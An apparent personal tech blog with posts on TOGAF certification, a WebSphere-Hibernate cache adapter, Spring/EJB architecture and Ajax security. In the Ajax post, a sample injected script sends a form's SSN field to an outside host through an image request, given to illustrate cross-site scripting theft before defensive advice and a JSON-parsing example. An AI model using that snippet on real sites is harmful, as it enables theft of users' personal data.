Gaurav Tripathi's Blog
Tuesday, May 01, 2012
Gelling Security Architecture with TOGAF
For more detail, click on http://www.articlesbase.com/information-technology-articles/gelling-security-architecture-with-togaf-5841146.html link.
Thursday, February 23, 2012
Preparing TOGAF 9 Certification
For Part 1:
- Read the TOGAF 9 documentation
- Focus on the inputs and outputs of each ADM phase (especially Phases E and F)
- High-level knowledge of the steps involved in each ADM phase
- Technical Reference Model
- Repository
Part 2 (though it is open book) is a bit tougher than Part 1, as it has scenario questions. Below are the topics/sections you should focus on:
- Read the TOGAF 9 documentation
- Focus on the inputs and outputs of each ADM phase
- In-depth knowledge of the steps involved in each ADM phase
- Artifacts (catalogs, matrices and diagrams) involved in each phase (especially Phases B, C and D)
- Also read the mapping of security architecture to TOGAF
- Iterative processes and guidelines
Tuesday, August 02, 2011
SOA with TOGAF
Monday, July 04, 2011
Guide to clear SCEA (OCMJEA) Part 2 & 3
Tuesday, December 21, 2010
WebSphere's DynaCache Hibernate Caching Adapter
WebSphere Application Server (6.x onwards) supports JPA (Java Persistence API). Its default ORM provider is OpenJPA, and other ORM tools can easily be plugged in. For distributed caching, WAS (WebSphere Application Server) uses DynaCache, which is very useful in a clustered environment. Because the caching architecture is pluggable, any ORM tool can be plugged in through an ORM caching adapter.
Hibernate is a very popular and stable ORM tool, but it has an issue with WAS: there is no Hibernate caching adapter to plug it into IBM's distributed caching framework.
So I decided to make a WebSphere-Hibernate DynaCache adapter so that anyone can easily use the renowned Hibernate ORM.
Please visit my project at http://code.google.com/p/webspherehibernateadapter/ for more detail.
Monday, December 06, 2010
High Scalable and Distributed Architecture
In the enterprise world, the Spring Framework combined with a standard ORM tool like Hibernate has gained considerable acceptance as a lightweight architecture for mid-size applications. The Java EE 5 specification also made major changes to the component architecture, trying to close gaps such as IoC and ORM.
The concept of IoC is still immature in Java EE 5, and the flexibility, AOP support and relative strengths of Spring and an ORM tool like Hibernate further improve the productivity and quality of any web-based application. As the JPA specification (part of Java EE 5) suggests a pluggable design, any JPA-compatible ORM tool can be used in any application server: IBM WebSphere, for example, uses Apache OpenJPA as its default provider, but Hibernate can easily be plugged in.
This article demonstrates how to build a highly scalable application with a hybrid of technologies: EJB 3.0, Spring 3.0.x and Hibernate. The Spring Framework has its own remoting APIs and options, but EJB is a standard specification and can easily be migrated across application servers.
By designing a flexible, component-based architecture, the application uses the power of EJB 3.0, the IoC and AOP of Spring 3.0.x, and the ORM capability of Hibernate.
For more detail, visit my published article on theserverside website.
Sunday, September 05, 2010
Ajax and Web Application Security
- HTML or XHTML: provides the standards for displaying content
- Cascading Style Sheets (CSS): also provides standards for how content is displayed
- JavaScript: a scripting language used for client-side, browser-based applications
- Document Object Model (DOM): a standard object model used for displaying dynamic content and handling the related interaction.
- XML and XSLT: provide the capability to manipulate, exchange and transfer data between client and server.
- XML HTTP Request (XMLHttpRequest): this client-side JavaScript API is used to connect to the server over HTTP and exchange information. The information can be plain text, XML or JSON.
- JavaScript Object Notation (JSON): a lightweight, text-based, language-independent data exchange format between client and server.
- The user generates an event, or some asynchronous event fires at the client end, resulting in a JavaScript call.
- An XMLHttpRequest object is created and configured with the request parameters, along with the event component identifier and user-defined values (if any).
- This object makes an asynchronous call to the web/application server. The call may go to a web service, a servlet, a JSF AJAX component, etc.
- Based on the request, the server may fetch the desired data from the data store.
- That data is pushed back to the client browser as plain text, XML or JSON.
- The XMLHttpRequest callback method receives the data, processes it and updates the HTML DOM representing the web page with the new information.
- Hacking passwords and cookies: a hacker can easily capture sensitive information like passwords, cookies etc. by injecting a script into any part of the DOM tree, for example:
    // injected script: on submit, the field value leaves the page inside an image request
    function hackdata() {
        var data = document.getElementById("ssn").value;
        document.images[0].src = "http://hackdata.com/hackdata=" + data;
    }
    document.getElementById("button").onclick = hackdata;
The above example shows how a hacker can steal sensitive information: as soon as the user clicks the submit button, an asynchronous request carrying the sensitive information goes to the hacker's site. With the same approach, a hacker can steal cookie information.
- Hacking keyboard events: through a key logger or mouse sniffer, sensitive information can be captured like:
- Inserting information: an attacker can modify the stylesheet to hide sensitive information, for example by setting the font colour to white.
- Data validation: to avoid XSS (cross-site scripting), the web application must validate its input data. Validate input and filter out possible active and malicious content from untrusted input sources.
- Avoid dynamic code generation and execution: avoid dynamic code generation, such as use of the eval method.
- Secure use of JSON: as JSON is a subset of JavaScript, a response may contain malicious code, and many JavaScript libraries use the eval() method to convert JSON into JavaScript objects. To avoid that, use the regular expression defined in RFC 4627 to make sure the JSON text does not contain executable code.
- Use of iframes: load data from a different domain into an iframe, which gets its own JavaScript execution context and DOM tree. This prevents a hacker from attacking the main page.
- Use a security testing tool: always use a vulnerability checking tool to detect potential vulnerabilities in advance.
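The RFC 4627 check referred to in the JSON point, applied to the data the XMLHttpRequest callback receives, alongside the eval-free JSON.parse, as an added example (not code from the original post); the function names and the sample responses are constructed for it:

```javascript
// Added example, not code from the original post: the JSON text check from
// RFC 4627 section 6, which the post recommends, beside the eval-free
// JSON.parse. The sample responses below are constructed for this example.

// RFC 4627 step 1: blank out every string literal. What remains of real JSON
// is only structural characters, numbers, true/false/null and whitespace.
function stripJsonStrings(text) {
  return text.replace(/"(\\.|[^"\\])*"/g, '');
}

// RFC 4627 step 2: any character outside that small alphabet (letters are
// limited to those in true, false, null and the exponent marker) means the
// text is not JSON and must not reach eval(). True when the text passes.
function looksLikeJson(text) {
  return !/[^,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/.test(stripJsonStrings(text));
}

// Legacy path used by pre-ES5 libraries: eval() guarded by the RFC check.
// Returns undefined instead of evaluating anything that fails the check.
function parseJsonLegacy(text) {
  if (!looksLikeJson(text)) return undefined;
  return eval('(' + text + ')'); // only reached for JSON-shaped text
}

// Preferred path: JSON.parse is a parser, not an interpreter, so a hostile
// response can only fail to parse; null signals a rejected response.
function parseJsonSafe(text) {
  try {
    return JSON.parse(text);
  } catch (e) {
    return null;
  }
}

// Constructed server responses: one honest payload and two hostile ones that
// would execute under an unguarded eval().
const GOOD = '{"user":"alice","roles":["reader","editor"],"active":true,"n":-1.5e3}';
const HOSTILE_CALL = '{"user":"alice"}; alert(1)';       // statement appended
const HOSTILE_EXPR = '{"user": window.location.href}';   // expression as a value
// Passes the character filter yet is not JSON: the filter guards eval(), it does
// not validate, which is why JSON.parse (which rejects it) is the better tool.
const ODD = '[true - false]';

// Runs one response through both paths; used when the script is run directly.
function compare(text) {
  return { filtered: looksLikeJson(text), legacy: parseJsonLegacy(text), safe: parseJsonSafe(text) };
}
console.log([GOOD, HOSTILE_CALL, HOSTILE_EXPR, ODD].map(compare));
```

The ODD case shows the limit of the RFC filter: it keeps arbitrary code away from eval() but does not guarantee the text is JSON, so where JSON.parse is available it should be used instead.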